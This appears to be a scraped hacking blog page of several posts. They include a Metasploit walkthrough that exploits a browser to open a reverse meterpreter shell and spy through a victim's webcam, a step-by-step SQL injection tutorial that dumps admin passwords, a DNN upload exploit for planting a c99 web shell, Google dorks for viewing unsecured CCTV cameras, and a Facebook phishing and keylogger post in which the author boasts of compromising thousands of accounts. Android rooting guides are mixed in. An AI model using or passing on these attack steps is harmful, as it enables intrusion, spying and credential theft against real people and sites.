hacking webcam using metasploit

                                                                   

Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and  take security yourself.
Open Metasploit and run following commands:

msf>  show exploits


msf>use windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name                Current Setting       Required           Description
   ----                     ---------------               --------               -----------
   SRVHOST            0.0.0.0                   yes              The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT             8080                      yes              The local port to listen on.
   SSL                         false                         no                Negotiate SSL for incoming connections
   SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
   SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                              no               The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name                  Current            Setting         Required  Description
   ----                    ---------------       --------              -----------
   EXITFUNC        process             yes               Exit technique: seh, thread, process, none
   LHOST                                             yes                The listen address
   LPORT                 4444                 yes               The listen port



Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.


msf  exploit(adobe_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)

Read more ...

website hacking methods by using sql injection

Website Hacking:

        

                                                  



SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.

  Portal Hacking (DNN) Technique:-

       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites.. 

Here U can use dez two Google Dorks

1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx

You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork

:inurl:/tabid/36/language/en-US/Default.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.


Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9: You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc 

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.
Now  Go to main page and refresh. you have seen hacked the website.

Done..!!

Read more ...

Root Kit for galaxy ace s5830i

How to Root Samsung Galaxy Ace s5830i

This guide is for s5830i ONLY!!DON'T USE FOR s5830!!It can damage your phone!!
DO NOT TRY FLASHING SOFTWARE FOR OTHER DEVICE!IT WILL BRICK YOUR PHONE!!!READ CAREFULL ALL THE POSTS!!
How to root Galaxy Ace s5830i.
1.Put update.zip in your main directory in the SD card.
2.Turn off your phone.
3.Boot in Recovery by pressing:POWER+VOLUME UP+HOME buttons.
4.In Recovery select Install zip from sd 
5.Choose update.zip
6.Reboot your phone and it's ready.There must be a Superuser icon in your Apps menu.

How to unroot
1.Exactly the same just put the file unroot in your main directory and folow the steps.

ClockWorkRecovery
1.Put the file ClockWorkRec5830i.zip in your main directory in SD again.
2.Turn off phone.
3.Boot in Recovery and select apply update.zip
4.Select ClockWorkRec5830i.
5.You have CWR but don't delete ClockWorkRec5830i.zip from the SD because 
every time you want to use it you must install it from the SD!!


Flashing s5830i with Odin v1.85
1.Turn off the phone and put it in Download mode by pressing Power+Volume Up+volume down.
2.Open Odin v1.84.Run as Administrator!.
3.Put the files in Odin and don't touch the settings
4.If it's a one-file firmware put it in PDA section.
If it's multiple put the files in the correct section.
5.Click start and don't touch the phone!Don't turn off computer and don't unplug the phone!It will reboot automatically and the first boot will take some time,so don't panic!

If you have "bricked" your s5830i a.k.a stuck at samsung logo just download Odin and flash PDA.tar form the link.stock firmware

Everything you're doing is up to you!I'm not responsible if you don't read!There's a binary counter on s5830i so be careful with flashing!

Update:samfirmware.com provide us with odin 1.84 with .pit file for our phone so from now on you can flash firmwares from samfirmware.com without problems. 
all files for root and cwm are here:
ROOT KIT

Read more ...

HACKING OF LIVE CCTV CAMERAS

How To Hack Into Live CCTV Cameras Around The World

How To Hack Into Live Cameras Around The World

This simple technique is called “Google Hacking”. We are just looking for unsecured. cameras around the world and writing a simplestring on google hack into them.
Follow the steps below:
1) Choose any of these strings to enter on google

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

2)Once you have picked one, simply copy it, and paste in on google.
3)Now choose any result and you will be seeing a live camera.

Read more ...

facebook hacking tricks

4 ways to Hack Facebook account password

    

Hi friends, I have already posted two posts on How to hack Facebook account password, first using the Keyloggers and other is using Phishing. Today I am going to reveal all the methods that can be used to hack a Facebook account password.

Today I will cover all 4 ways to Hack Facebook Account Password that all hackers usually use to hack your Facebook account.

1. Facebook Phishing Attack

2. Hacking Facebook account password remotely using Keyloggers and RAT's

3. By hacking the primary email address that user has used for creating Facebook account.

4. Social Engineering or simply Guessing your friends Password.

Facebook Phishing Attack:

I am explaining this method first because its the most easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity.

Now you want to know which is my favorite method for Hacking Facebook account passwords and i will undoubtedly tell its simply PHISHING.

I will recommend my users to read this post for knowing how to hack Facebook using Phishing as i have explained it in detail here:

If you want latest Facebook phisher then subscribe my Hacking tricks and mail me privately or post your email below in comments. I will provide you within a day, Now why i am not providing it directly, if i provide directly then Facebook will block it again like the previous one. 

Hacking Facebook account password remotely using Keyloggers and RAT's

Aaw... Best method for advanced Hackers. And my second favorite too. Its popularity is little but lower than Phishing only because it involves you to download hack tool and then create your keylogger and send it to victim which is a lengthy process and also unsecured too as you don't aware that the keylogger that you downloading is himself contain some spyware or simply a keylogger attached with it. Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack Facebook password.

I have written a complete article on How to hack Facebook accounts remotely using Keyloggers, so i will recommend you to go through that if you want to learn this technique in detail, so read this article:

Now if you need latest Fully Undetectable Keylogger, then subscribe my hacking tricks and mail me privately or post ur email ID below in comments on which you want to getthe download link.

Hacking the Primary Email address 

 If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using "Forgot password" trick. The Hacker will simply ask Facebook to send password to the primary email address and ask Facebook administrators to send the reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will also be hacked !

So, always remember to protect your primary email address that you have used to create Facebook account and try to keep unknown or useless mail id as your primary email address in Facebook.
     

Social Engineering or Guessing Passwords

This method sounds to be pretty not working at beginning. Even I was neglecting this way for a long time . But, once, I thought of using it against my friend on Facebook and amazingly what happened that i guessed his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For novice hackers, Social engineering is method of retrieving password or Guessing the password or answer of security question simply be hacking some information about the victim or simply gathering his information from his own Facebook and other social networking profiles where most of users provide their critical information just for fashion and doesn't know its consequences. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.

Some Common passwords that you can try on your friends are :

1. Their mobile number or their girlfriend or boyfriend mobile number. (always try his previous or old mobile number as they are not as much as fool that they appears)

2. Their Girlfriend or boyfriend names or their own names concatenating with their Girlfriend or boyfriend names.

3. Date of births

4. Their favorite movie names , cartoon character names or favorite music band names or simply the hero names like batman,dark knight, Superman,Godzilla, Spartacus and much more..

5. Most important now most website ask that password should be alphanumeric now what users do they just adds 1,2,3 in their normal passwords and some more smart guys adds !,@,# in their passwords and amazingly all in Sequence.

Note the above common passwords are not from any internet resource, its by my own case study that i have come to conclusion after hacking 19,788 emails accounts. I know now you want to know how i hacked so much accounts. As i have already mentioned for advanced hackers second option is best and the only thing that i did was just made my Keylogger USB and pendrive spreadable. Who ever used the infected USB drive also got infected and this procedure goes so on. And last what happened  my 10Gb free storage was filled and i don't have enough time to clean it regularly. 

Read more ...

Hacking Introduction

What is computer hacking? Introduction to Hacking

what is computer hacking:

In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking.

Now a days,  People started think that hacking is only hijacking Facebook accounts or defacing websites.  Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking.

So what is exactly hacking, what should i do to become a hacker?!  Don't worry, you will learn it from Break The Security. The main thing you need to become a hacker is self-interest.  You should always ready to learn something and learn to create something new. 


Now , let me explain about different kind of hackers exist in the cyber security world.

Script Kiddie

Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers.  In a simple word, the one who doesn't know how a system works but still able to exploit it with previously available tools.

White Hat Hacker:
White Hat hackers are good guys who does the hacking for defensing.  The main aim of a Whitehat hacker is to improve the security of a system by finding security flaws and fixing it.  They work for an organization or individually to make the cyber space more secure.

Break The Security only concentrates on white-hat hacking and help you to learn the Ethical Hackingworld.

Black Hat Hacker:
BlackHat hackers are really bad guys , cyber criminals , who have malicious intent.  The hackers who steal money, infect systems with malware,  etc are referred as BlackHat hackers.  They use their hacking skills for illegal purposes.

GreyHat hackers:

The hackers who may work offensively or defensively, depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.

Hacktivists
The hackers who use their hacking skills for protesting against injustice and attack a target system and websites to bring the justice.  One of the popular hacktivists is Anonymous and RedHack.

Read more ...

Root and CWM recovery for galaxy note n7000

Root Samsung Galaxy Note GT-N7000 on Android 4.1.2 Jelly Bean Firmware

The Samsung Galaxy Note GT-7000 has received the long-waited Android 4.1.2 Jelly Bean firmware update. The new update has revived and revamped the whole UI of the device and has added a plethora of new features and improvements that have given the owners of this giant phone another reason to stay with it. The JB update has blessed the Galaxy Note with most of the features of Samsung’s Premium Suite Upgradethat include Google Now, Project Butter, better battery management, new notification panel, page buddy, two homescreen modes, new S Note and S Pen features and so on.

If you have already updated your Galaxy Note GT-N7000  to the latest Android 4.1.2 Jelly Bean firmware and want to root it and install the ClockworkMod Recovery on it, our easy tutorial on the topic might help you do this. By rooting your phone, you will be able to install a number of essential apps that can make your device better, but can also make you privileged to be able to install a mod or custom ROM. Using a custom recovery, you can also backup your ROMs and restore them back any time. To reclaim device’s warranty you can install the stick firmware later. If you are confused if you should root your phone or not, read our great article that might help you with this.

Disclaimer:

Please note that rooting your Galaxy Note will certainly void its warranty and if you are not careful enough, it might also put your device in risk. As the owner of  phone you know better what is good for you. We, at Droidviews, or the developers of this method will not, in any case be liable to any mishap. Proceed only if you understand what you are about to do. Further, the procedure given below is meant only for the international model of the Galaxy Note with model number GT-N7000. Trying it with a different phone or model might produce bizarreresults.

Getting the Weapons Ready:

So, if you have decided to fight against the bondage of stock firmware and to enjoy greater freedom, we salute you. There are a few preparations, however, you need to do before actually rooting your Samsung Galaxy Note. Below you will see 2 methods that can be used to root the Galaxy Note with Jelly Bean ROM.

1. Rooting and installing PhilZ Kernel with CWM Touch Recovery zip via stock recovery It does not bump up the flash counter and thus you do not lose warranty.
2. Rooting and installing PhilZ Kernel with CWM Touch Recovery tar file via Odin (increases flash counter).

Also take care of the following things:

• Make sure you phone has a decent battery-life left.
• Turn on USB Debugging on your phone from Settings> Developer Options> USB Debugging
• Rooting does not delete any data from you phone but as a precautionary step, you can backup your contacts, messages, app, etc. Backup your contacts, messages, APNs, bookmarks, calendar, apps & games Using These Apps.

 Rooting Galaxy Note via Stock Recovery

This method does not increase flash/binary counter, nor does it create the notorious Yellow Triangle that shudders many people. In other words, it does not void the warranty of your Galaxy Note GT-N7000.

This method does not increase flash/binary counter, nor does it create the notorious Yellow Triangle that shudders many people. In other words, it does not void the warranty of your Galaxy Note GT-N7000.

This method does not increase flash/binary counter, nor does it create the notorious Yellow Triangle that shudders many people. In other words, it does not void the warranty of your Galaxy Note GT-N7000.

1. Download PhilZ-cwm6–signed.zip file that corresponds to your device firmware. You can check the Firmware version from Settings> About. Make sure that you download the file with .ZIP extension to install via Recovery:Download PhilZ Rooted Kernel with CWM
2. Copy the zip file to the external SD card memory on your Galaxy Note.
3. Turn off the phone and boot it into recovery mode. If you have a smartphone, you can do it this way: press and hold the Volume Up+Home buttons together and then hold the Power button till the screen turns up and the Samsung logo blinks for two times. Release the Power button but keep the other two keys pressed till you see a black screen with green Android bot and Blue text. 
4. 
5. Using the volume keys for moving up and down, scroll down to “apply update from external storage”. Press the power button and navigate to the PhilZ-cwm6-XXLSZ-OXA-4.63-signed.zip file and select it. Confirm your choice if asked.
6. When the installation if finished, select “reboot system now” option.
When the phone boots up, you will see “Android is upgrading…” message on your Note’s screen. When the phone is finally ready to be used, open app drawer and look for an app called SuperSU. Open the app and update the binary if asked to do so. Done! Note: To later boot into CWM Recovery mode,  you can use the same method as described in Step 3.

Read more ...

XOLO A500s ROOT

Important Anouncement:-I am making a true customizable custom rom for my best Xolo A500S& lovely device.
It will have Advanced Features,let them be a surprise for now 
All I want from you guys is FULL SUPPORT.

Did some of the work,totally new features.Advanced Rom G : D.B.X V3 Realoaded with customization and tweakness.

*TABBED SETTINGS :- Categorised Everything properly everything at right place.
*OWNER PROFILE :- Added Owner Profile by the way we add our image in 4.2.2 statusbar.

Will soon be available as I will finish modding 

ROOTING

Hey,Guys
There is not very much for our device at this moment.We can just have Root Access!!
But,It's just the starting ,as the time is being passed we will have more developers & even could have Custom Rom's 
But,We need a thread for a good start so for this purpose this thread has been created.

Quote:

As the TITLE suggests ALL THINGS ROOT & DEVELOPENT So,Everything related to XOLO A500S should be posted here,in this thread only!!

So,Let me remind you the specifications of the Device-

Quote:

2G Network-GSM 900 / 1800 - SIM 1 & SIM 2 3G Network-HSDPA 2100 Dimensions-125 x 63.2 x 9 mm (4.92 x 2.49 x 0.35 in) Type-TFT capacitive touchscreen, 16M colors Size-480 x 800 pixels, 4.0 inches (~233 ppi pixel density) Card slot-microSD, up to 32 GB OS-Android OS, v4.2 (Jelly Bean) Chipset-MTK 6572W CPU-Dual-core 1.3 GHz GPU-Mali-400MP Primary Camera-5 MP, 2592 х 1944 pixels, LED flash Sensors-Accelerometer, proximity

So,You would be familiar with all the above features as you are having the device.

Now Comes ROOTING
There isn't anything hard in Rooting this Phone it's very Easy & just One-Click. 

Quote:

HOW TO ROOT??

Download ONE CLICK ROOT from http://www.oneclickroot.com/download-now/ Install it & then select SUPERSU from the list. Then Click on ROOT and Reboot the device. Yeah,you finally ROOTED,you did it.

Read more ...